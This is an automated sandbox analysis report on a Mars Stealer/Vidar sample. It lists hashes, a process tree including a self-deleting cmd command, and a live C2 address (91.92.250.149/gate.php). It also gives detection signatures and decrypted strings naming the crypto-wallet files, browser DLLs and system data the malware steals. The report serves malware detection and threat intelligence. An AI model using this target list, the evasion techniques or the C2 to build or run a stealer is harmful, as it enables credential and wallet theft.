Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4bVsmYiuXy.exe

Overview

General Information

Sample name:4bVsmYiuXy.exe
renamed because original name is a hash value
Original sample name:bffa608e609a6e2f67d01bb5f64ba70a.exe
Analysis ID:1363447
MD5:bffa608e609a6e2f67d01bb5f64ba70a
SHA1:dfc31151b6886f6a0e18c6a564f766591772b78f
SHA256:27c43e0863d1f53297dc16f09626d956c6f86cf3285bbd8eb8488eccb564fa66
Tags:ArkeiStealerexe
Infos:

Detection

Mars Stealer, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mars stealer
Yara detected Vidar stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
DLL side loading technique detected
Found C&C like URL pattern
Found evasive API chain (may stop execution after checking computer name)
Found evasive API chain (may stop execution after checking mutex)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 4bVsmYiuXy.exe (PID: 1028 cmdline: C:\Users\user\Desktop\4bVsmYiuXy.exe MD5: BFFA608E609A6E2F67D01BB5F64BA70A)
    • AddInProcess32.exe (PID: 6600 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinProcess32.exe MD5: 9827FF3CDF4B83F9C86354606736CA9C)
      • cmd.exe (PID: 6508 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinProcess32.exe" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 6840 cmdline: timeout /t 5 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Mars Stealer

{"C2 url": "91.92.250.149/gate.php"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1632581206.00000000032CE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    00000000.00000002.1632581206.00000000032CE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
      00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000001.00000002.1678827936.0000000000E77000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.1632581206.00000000032CE000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_ArkeiStealer_84c7086aunknownunknown
          • 0x5430:$a: 01 89 55 F4 8B 45 F4 3B 45 10 73 31 8B 4D 08 03 4D F4 0F BE 19 8B
          Click to see the 16 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.4bVsmYiuXy.exe.32ceb10.1.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            0.2.4bVsmYiuXy.exe.32ceb10.1.raw.unpackJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
              0.2.4bVsmYiuXy.exe.32ceb10.1.raw.unpackWindows_Trojan_ArkeiStealer_84c7086aunknownunknown
              • 0x4920:$a: 01 89 55 F4 8B 45 F4 3B 45 10 73 31 8B 4D 08 03 4D F4 0F BE 19 8B
              1.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                1.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
                  Click to see the 19 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  Timestamp:91.92.250.149192.168.2.480497292036654 12/16/23-18:16:56.208992
                  SID:2036654
                  Source Port:80
                  Destination Port:49729
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.491.92.250.14949729802022818 12/16/23-18:16:55.658028
                  SID:2022818
                  Source Port:49729
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.491.92.250.14949729802036667 12/16/23-18:16:55.963288
                  SID:2036667
                  Source Port:49729
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.491.92.250.14949729802022986 12/16/23-18:16:55.658028
                  SID:2022986
                  Source Port:49729
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: 4bVsmYiuXy.exeAvira: detected
                  Antivirus detection for URL or domain
                  Source: http://91.92.250.149/request/Avira URL Cloud: Label: malware
                  Source: http://91.92.250.149/gate.phpAvira URL Cloud: Label: malware
                  Source: 91.92.250.149/gate.phpAvira URL Cloud: Label: malware
                  Source: http://91.92.250.149/requestAvira URL Cloud: Label: malware
                  Found malware configuration
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackMalware Configuration Extractor: Mars Stealer {"C2 url": "91.92.250.149/gate.php"}
                  Multi AV Scanner detection for domain / URL
                  Source: http://91.92.250.149/requestVirustotal: Detection: 5%Perma Link
                  Source: 91.92.250.149/gate.phpVirustotal: Detection: 14%Perma Link
                  Source: http://91.92.250.149/gate.phpVirustotal: Detection: 14%Perma Link
                  Multi AV Scanner detection for submitted file
                  Source: 4bVsmYiuXy.exeVirustotal: Detection: 54%Perma Link
                  Machine Learning detection for sample
                  Source: 4bVsmYiuXy.exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: LoadLibraryA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetProcAddress
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: ExitProcess
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: advapi32.dll
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: crypt32.dll
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetTickCount
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Sleep
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetUserDefaultLangID
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: CreateMutexA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetLastError
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: HeapAlloc
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetProcessHeap
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetComputerNameA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: VirtualProtect
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetCurrentProcess
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: VirtualAllocExNuma
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetUserNameA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: CryptStringToBinaryA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: HAL9TH
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: JohnDoe
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: 21/04/2022 20:00:00
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: http://
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Default
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: %hu/%hu/%hu %hu:%hu:%hu
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: open
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: sqlite3.dll
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: C:\ProgramData\sqlite3.dll
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: freebl3.dll
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: C:\ProgramData\freebl3.dll
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: mozglue.dll
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: C:\ProgramData\mozglue.dll
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: msvcp140.dll
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: C:\ProgramData\msvcp140.dll
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: nss3.dll
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: C:\ProgramData\nss3.dll
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: softokn3.dll
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: C:\ProgramData\softokn3.dll
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: vcruntime140.dll
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: C:\ProgramData\vcruntime140.dll
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: .zip
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Tag:
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: IP: IP?
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Country: Country?
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Working Path:
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Local Time:
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: TimeZone:
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Display Language:
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Keyboard Languages:
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Is Laptop:
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Processor:
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Installed RAM:
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: OS:
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Bit)
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Videocard:
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Display Resolution:
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: PC name:
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: User name:
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Domain name:
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: MachineID:
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GUID:
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Installed Software:
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: system.txt
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Grabber\%s.zip
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: %APPDATA%
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: %LOCALAPPDATA%
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: %USERPROFILE%
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: %DESKTOP%
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Wallets\
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Ethereum
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Ethereum\
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: keystore
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Electrum
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Electrum\wallets\
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: ElectrumLTC
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Electrum-LTC\wallets\
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Exodus
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Exodus\
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: exodus.conf.json
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: window-state.json
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Exodus\exodus.wallet\
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: passphrase.json
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: seed.seco
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: info.seco
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: ElectronCash
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \ElectronCash\wallets\
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: default_wallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: MultiDoge
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \MultiDoge\
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: multidoge.wallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: JAXX
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \jaxx\Local Storage\
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: file__0.localstorage
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Atomic
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \atomic\Local Storage\leveldb\
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: 000003.log
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: CURRENT
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: LOCK
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: MANIFEST-000001
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: 0000*
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Binance
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Binance\
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: app-store.json
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: Coinomi
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: \Coinomi\Coinomi\wallets\
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: *.wallet
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: *.config
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: *wallet*.dat
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetSystemTime
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: lstrcatA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: SystemTimeToFileTime
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: ntdll.dll
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: sscanf
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: memset
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: memcpy
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: wininet.dll
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: user32.dll
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: gdi32.dll
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: netapi32.dll
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: psapi.dll
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: bcrypt.dll
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: vaultcli.dll
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: shlwapi.dll
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: shell32.dll
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: gdiplus.dll
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: ole32.dll
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: dbghelp.dll
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: CreateFileA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: WriteFile
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: CloseHandle
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetFileSize
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: lstrlenA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: LocalAlloc
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GlobalFree
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: ReadFile
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: OpenProcess
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: SetFilePointer
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: SetEndOfFile
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetCurrentProcessId
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetLocalTime
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetTimeZoneInformation
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetUserDefaultLocaleName
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: LocalFree
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetSystemPowerStatus
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetSystemInfo
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GlobalMemoryStatusEx
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: IsWow64Process
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetTempPathA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetLocaleInfoA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetFileSizeEx
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetFileAttributesA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: FindFirstFileA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: FindNextFileA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: FindClose
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetCurrentDirectoryA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: CopyFileA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: DeleteFileA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: lstrcmpW
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GlobalAlloc
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: FreeLibrary
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: SetCurrentDirectoryA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: CreateFileMappingA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: MapViewOfFile
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: UnmapViewOfFile
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: FileTimeToSystemTime
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetFileInformationByHandle
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GlobalLock
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GlobalSize
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: WideCharToMultiByte
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetWindowsDirectoryA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetVolumeInformationA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetVersionExA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetModuleFileNameA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: CreateFileW
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: CreateFileMappingW
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: MultiByteToWideChar
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: CreateThread
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetEnvironmentVariableA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: SetEnvironmentVariableA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: lstrcpyA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: lstrcpynA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: InternetOpenA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: InternetConnectA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: HttpOpenRequestA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: HttpSendRequestA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: HttpQueryInfoA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: InternetCloseHandle
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: InternetReadFile
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: InternetSetOptionA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: InternetOpenUrlA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: InternetCrackUrlA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: wsprintfA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: CharToOemW
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetKeyboardLayoutList
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: EnumDisplayDevicesA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: ReleaseDC
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetDC
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetSystemMetrics
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetDesktopWindow
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetWindowRect
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetWindowDC
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: CloseWindow
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: RegOpenKeyExA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: RegQueryValueExA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: RegCloseKey
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetCurrentHwProfileA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: RegEnumKeyExA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: RegGetValueA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: CreateDCA
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetDeviceCaps
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: CreateCompatibleDC
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: CreateCompatibleBitmap
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: SelectObject
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: BitBlt
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: DeleteObject
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: StretchBlt
                  Source: 0.2.4bVsmYiuXy.exe.132a9940.3.raw.unpackString decryptor: GetObjectW
